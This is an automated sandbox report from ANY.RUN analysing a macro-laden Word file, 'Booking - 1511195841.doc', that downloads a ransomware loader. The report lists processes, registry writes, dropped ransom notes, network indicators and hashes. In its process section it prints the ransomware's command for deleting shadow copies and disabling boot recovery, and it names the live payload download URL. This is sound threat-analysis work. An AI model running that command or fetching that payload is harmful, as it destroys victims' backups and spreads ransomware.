File name: Booking - 1511195841.doc

Full analysis: https://app.any.run/tasks/fa135a99-9a57-4b9a-9187-bc2ab5829187
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: June 19, 2019, 15:52:50
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags: macros, macros-on-open, loader, ransomware, opendir
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Template: Normal, Last Saved By: Administrator, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Wed Jun 19 19:26:00 2019, Last Saved Time/Date: Wed Jun 19 10:29:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5: 61D493D1DBE1947A337E664BBFF9E21B
SHA1: 0F5B473AE4E46401E13505188F24009C8F18A34A
SHA256: E9736F2494AAB6CD9514D9596E1AD9A2B85E6B6457F5D06934F8E5E402A59176
SSDEEP: 3072:sKEcYSUEVu228iY7+V+nwbJ26iJqjJoiTqciJqAkmkj9JxXIRn0:S5SUx9j2lkF7d

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Requests a remote executable file from MS Office
      • WINWORD.EXE (PID: 1684)
    • Executable content was dropped or overwritten
      • WINWORD.EXE (PID: 1684)
    • Unusual execution from Microsoft Office
      • WINWORD.EXE (PID: 1684)
    • Application was dropped or rewritten from another process
      • Compatibility-mode.exe (PID: 2596)
      • Compatibility-mode.exe (PID: 2692)
    • Deletes shadow copies
      • cmd.exe (PID: 1136)
    • Dropped file may contain instructions of ransomware
      • Compatibility-mode.exe (PID: 2692)
    • Renames files like Ransomware
      • Compatibility-mode.exe (PID: 2692)
    • Changes settings of System certificates
      • Compatibility-mode.exe (PID: 2692)
  • SUSPICIOUS
    • Reads Internet Cache Settings
      • WINWORD.EXE (PID: 1684)
    • Application launched itself
      • Compatibility-mode.exe (PID: 2596)
    • Starts CMD.EXE for commands execution
      • Compatibility-mode.exe (PID: 2692)
    • Creates files in the program directory
      • Compatibility-mode.exe (PID: 2692)
    • Executed as Windows Service
      • vssvc.exe (PID: 2444)
    • Creates files like Ransomware instruction
      • Compatibility-mode.exe (PID: 2692)
    • Adds / modifies Windows certificates
      • Compatibility-mode.exe (PID: 2692)
  • INFO
    • Reads Microsoft Office registry keys
      • WINWORD.EXE (PID: 1684)
    • Reads the machine GUID from the registry
      • WINWORD.EXE (PID: 1684)
    • Dropped object may contain TOR URL's
      • Compatibility-mode.exe (PID: 2692)
    • Manual execution by user
      • NOTEPAD.EXE (PID: 1180)
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal
LastModifiedBy: Administrator
RevisionNumber: 2
Software: Microsoft Office Word
TotalEditTime: 1.0 minutes
CreateDate: 2019:06:19 18:26:00
ModifyDate: 2019:06:19 09:29:00
Pages: 1
Words: -
Characters: 1
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Bytes: 11000
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 1
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
All screenshots are available in the full report
Total processes: 42
Monitored processes: 7
Malicious processes: 4
Suspicious processes: 0

Behavior graph

Process nodes: winword.exe → (drop and start) compatibility-mode.exe → compatibility-mode.exe; cmd.exe; vssadmin.exe; vssvc.exe; notepad.exe

Process information

(fields per process: PID, CMD, Path, Indicators, Parent process)
PID: 1136
CMD: "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures
Path: C:\Windows\SysWOW64\cmd.exe
Parent process: Compatibility-mode.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows Command Processor
Exit code: 1
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules (images):
  • c:\windows\syswow64\cmd.exe
  • c:\systemroot\system32\ntdll.dll
  • c:\systemroot\syswow64\ntdll.dll
  • c:\windows\system32\wow64.dll
  • c:\windows\system32\wow64win.dll
  • c:\windows\system32\wow64cpu.dll
  • c:\windows\system32\kernel32.dll
  • c:\windows\syswow64\kernel32.dll
  • c:\windows\system32\user32.dll
  • c:\windows\syswow64\kernelbase.dll
PID: 1180
CMD: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\cyhf672-readme.txt
Path: C:\Windows\system32\NOTEPAD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Notepad
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules (images):
  • c:\windows\system32\notepad.exe
  • c:\systemroot\system32\ntdll.dll
  • c:\windows\system32\kernel32.dll
  • c:\windows\system32\kernelbase.dll
  • c:\windows\system32\advapi32.dll
  • c:\windows\system32\msvcrt.dll
  • c:\windows\system32\sechost.dll
  • c:\windows\system32\rpcrt4.dll
  • c:\windows\system32\gdi32.dll
  • c:\windows\system32\user32.dll
PID: 1684
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Booking - 1511195841.doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Exit code: 0
Version: 14.0.5123.5000
Modules (images):
  • c:\program files\microsoft office\office14\winword.exe
  • c:\systemroot\system32\ntdll.dll
  • c:\windows\system32\kernel32.dll
  • c:\windows\system32\kernelbase.dll
  • c:\windows\winsxs\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251\msvcr90.dll
  • c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
  • c:\windows\system32\advapi32.dll
  • c:\windows\system32\msvcrt.dll
  • c:\windows\system32\sechost.dll
  • c:\windows\system32\rpcrt4.dll
PID: 2444
CMD: C:\Windows\system32\vssvc.exe
Path: C:\Windows\system32\vssvc.exe
Parent process: services.exe
User: SYSTEM
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Microsoft® Volume Shadow Copy Service
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules (images):
  • c:\windows\system32\vssvc.exe
  • c:\systemroot\system32\ntdll.dll
  • c:\windows\system32\kernel32.dll
  • c:\windows\system32\kernelbase.dll
  • c:\windows\system32\advapi32.dll
  • c:\windows\system32\msvcrt.dll
  • c:\windows\system32\sechost.dll
  • c:\windows\system32\rpcrt4.dll
  • c:\windows\system32\user32.dll
  • c:\windows\system32\gdi32.dll
PID: 2580
CMD: vssadmin.exe Delete Shadows /All /Quiet
Path: C:\Windows\SysWOW64\vssadmin.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Command Line Interface for Microsoft® Volume Shadow Copy Service
Exit code: 2
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules (images):
  • c:\windows\syswow64\vssadmin.exe
  • c:\systemroot\system32\ntdll.dll
  • c:\systemroot\syswow64\ntdll.dll
  • c:\windows\system32\wow64.dll
  • c:\windows\system32\wow64win.dll
  • c:\windows\system32\wow64cpu.dll
  • c:\windows\system32\kernel32.dll
  • c:\windows\syswow64\kernel32.dll
  • c:\windows\system32\user32.dll
  • c:\windows\syswow64\kernelbase.dll
PID: 2596
CMD: "C:\Users\admin\AppData\Local\Temp\Compatibility-mode.exe"
Path: C:\Users\admin\AppData\Local\Temp\Compatibility-mode.exe
Parent process: WINWORD.EXE
User: admin
Integrity Level: MEDIUM
Exit code: 0
Modules (images):
  • c:\users\admin\appdata\local\temp\compatibility-mode.exe
  • c:\systemroot\system32\ntdll.dll
  • c:\systemroot\syswow64\ntdll.dll
  • c:\windows\system32\wow64.dll
  • c:\windows\system32\wow64win.dll
  • c:\windows\system32\wow64cpu.dll
  • c:\windows\system32\kernel32.dll
  • c:\windows\syswow64\kernel32.dll
  • c:\windows\system32\user32.dll
  • c:\windows\syswow64\kernelbase.dll
PID: 2692
CMD: "C:\Users\admin\AppData\Local\Temp\Compatibility-mode.exe"
Path: C:\Users\admin\AppData\Local\Temp\Compatibility-mode.exe
Parent process: Compatibility-mode.exe
User: admin
Integrity Level: HIGH
Exit code: 0
Modules (images):
  • c:\users\admin\appdata\local\temp\compatibility-mode.exe
  • c:\systemroot\system32\ntdll.dll
  • c:\systemroot\syswow64\ntdll.dll
  • c:\windows\system32\wow64.dll
  • c:\windows\system32\wow64win.dll
  • c:\windows\system32\wow64cpu.dll
  • c:\windows\system32\kernel32.dll
  • c:\windows\syswow64\kernel32.dll
  • c:\windows\system32\user32.dll
  • c:\windows\syswow64\kernelbase.dll
Total events: 1 416
Read events: 1 035
Write events: 376
Delete events: 5

Modification events

(PID) Process: (1684) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation: write
Name: k>"
Value: 6B3E220094060000010000000000000000000000

(PID) Process: (1684) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write
Name: 1033
Value: Off

(PID) Process: (1684) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write
Name: 1033
Value: On

(PID) Process: (1684) WINWORD.EXE
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
Operation: write
Name: WORDFiles
Value: 1322450986

(PID) Process: (1684) WINWORD.EXE
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
Operation: write
Name: ProductFiles
Value: 1322451078

(PID) Process: (1684) WINWORD.EXE
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
Operation: write
Name: ProductFiles
Value: 1322451079

(PID) Process: (1684) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation: write
Name: MTTT
Value: 94060000005BDA15B726D50100000000

(PID) Process: (1684) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation: write
Name: l "
Value: 6C2022009406000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000

(PID) Process: (1684) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation: delete value
Name: l "
Value: 6C2022009406000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000

(PID) Process: (1684) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: ProxyBypass
Value: 1
Executable files: 2
Suspicious files: 143
Text files: 1
Unknown types: 6

Dropped files

PID: 1684 | Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\CVRDE6B.tmp.cvr
MD5:
SHA256:

PID: 2692 | Process: Compatibility-mode.exe
Filename: C:\Recovery\de82876a-02a9-11e8-aa76-af8e13208fdf\Winre.wim
MD5:
SHA256:

PID: 2692 | Process: Compatibility-mode.exe
Filename: C:\Recovery\de82876a-02a9-11e8-aa76-af8e13208fdf\boot.sdi
MD5:
SHA256:

PID: 2692 | Process: Compatibility-mode.exe
Filename: c:\recovery\de82876a-02a9-11e8-aa76-af8e13208fdf\Winre.wim.cyhf672
MD5:
SHA256:

PID: 1684 | Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\Compatibility-mode.exe
Type: executable
MD5:
SHA256:

PID: 1684 | Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\~$oking - 1511195841.doc
Type: pgc
MD5:
SHA256:

PID: 2692 | Process: Compatibility-mode.exe
Filename: C:\users\cyhf672-readme.txt
Type: binary
MD5:
SHA256:

PID: 2692 | Process: Compatibility-mode.exe
Filename: C:\Users\admin\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
MD5:
SHA256:

PID: 1684 | Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K78MRVB5\prola[1].exe
Type: executable
MD5:
SHA256:

PID: 2692 | Process: Compatibility-mode.exe
Filename: C:\program files (x86)\cyhf672-readme.txt
Type: binary
MD5:
SHA256:
HTTP(S) requests: 5
TCP/UDP connections: 128
DNS requests: 96
Threats: 5

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
1684 | WINWORD.EXE | GET | 200 | 2.185.239.164:80 | http://btta.xyz/prola.exe | IR | executable | 378 Kb | malicious
2692 | Compatibility-mode.exe | GET | 200 | 192.35.177.64:80 | http://apps.identrust.com/roots/dstrootcax3.p7c | US | cat | 893 b | shared
2692 | Compatibility-mode.exe | GET | 200 | 93.184.221.240:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/B51C067CEE2B0C3DF855AB2D92F4FE39D4E70F0E.crt?e57873237d26d5cc | US | der | 993 b | whitelisted
2692 | Compatibility-mode.exe | GET | 200 | 93.184.221.240:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?2b0e034bfaff30a9 | US | compressed | 56.2 Kb | whitelisted
2692 | Compatibility-mode.exe | GET | 200 | 93.184.221.240:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/DF3C24F9BFD666761B268073FE06D1CC8D4F82A4.crt?9ab7c1c1fc7648da | US | der | 914 b | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
2692 | Compatibility-mode.exe | 192.35.177.64:80 | apps.identrust.com | IdenTrust | US | malicious
1684 | WINWORD.EXE | 2.185.239.164:80 | btta.xyz | Iran Telecommunication Company PJS | IR | suspicious
2692 | Compatibility-mode.exe | 166.62.108.43:443 | luvbec.com | GoDaddy.com, LLC | US | malicious
2692 | Compatibility-mode.exe | 103.23.22.248:443 | alharsunindo.com | PT Infinys System Indonesia | ID | suspicious
2692 | Compatibility-mode.exe | 149.210.195.135:443 | salonlamar.nl | Transip B.V. | NL | malicious
2692 | Compatibility-mode.exe | 157.230.253.64:443 | babysitting-hk.helpergo.co | Joao Carlos de Almeida Silveira trading as Bitcanal | US | suspicious
2692 | Compatibility-mode.exe | 45.76.45.105:443 | triplettagaite.fr | Choopa, LLC | FR | unknown
2692 | Compatibility-mode.exe | 37.221.193.90:443 | tages-geldvergleich.de | netcup GmbH | DE | unknown
2692 | Compatibility-mode.exe | 77.104.183.21:443 | grancanariaregional.com | | US | suspicious
2692 | Compatibility-mode.exe | 160.153.198.141:443 | global-migrate.com | GoDaddy.com, LLC | US | suspicious

DNS requests

Domain | IP | Reputation
btta.xyz | 2.185.239.164, 193.107.99.167, 62.73.70.146, 190.140.53.138, 197.255.246.6, 95.43.57.155, 41.110.200.194, 188.254.186.158, 2.185.146.116, 37.152.176.90 | malicious
luvbec.com | 166.62.108.43 | suspicious
salonlamar.nl | 149.210.195.135 | suspicious
alharsunindo.com | 103.23.22.248 | suspicious
babysitting-hk.helpergo.co | 157.230.253.64 | suspicious
apps.identrust.com | 192.35.177.64 | shared
ctldl.windowsupdate.com | 93.184.221.240 | whitelisted
amco.net.au | 104.25.143.36, 104.25.144.36 | suspicious
nuohous.com | 185.55.85.6 | suspicious
grancanariaregional.com | 77.104.183.21 | suspicious

Threats

PID | Process | Class | Message
1684 | WINWORD.EXE | A Network Trojan was detected | ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016
1684 | WINWORD.EXE | Potentially Bad Traffic | AV INFO HTTP Request to a *.xyz domain
1684 | WINWORD.EXE | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP
416 | svchost.exe | Not Suspicious Traffic | ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup)
2692 | Compatibility-mode.exe | Not Suspicious Traffic | ET INFO Observed SSL Cert for Free Hosting Domain (*.000webhostapp .com)
No debug info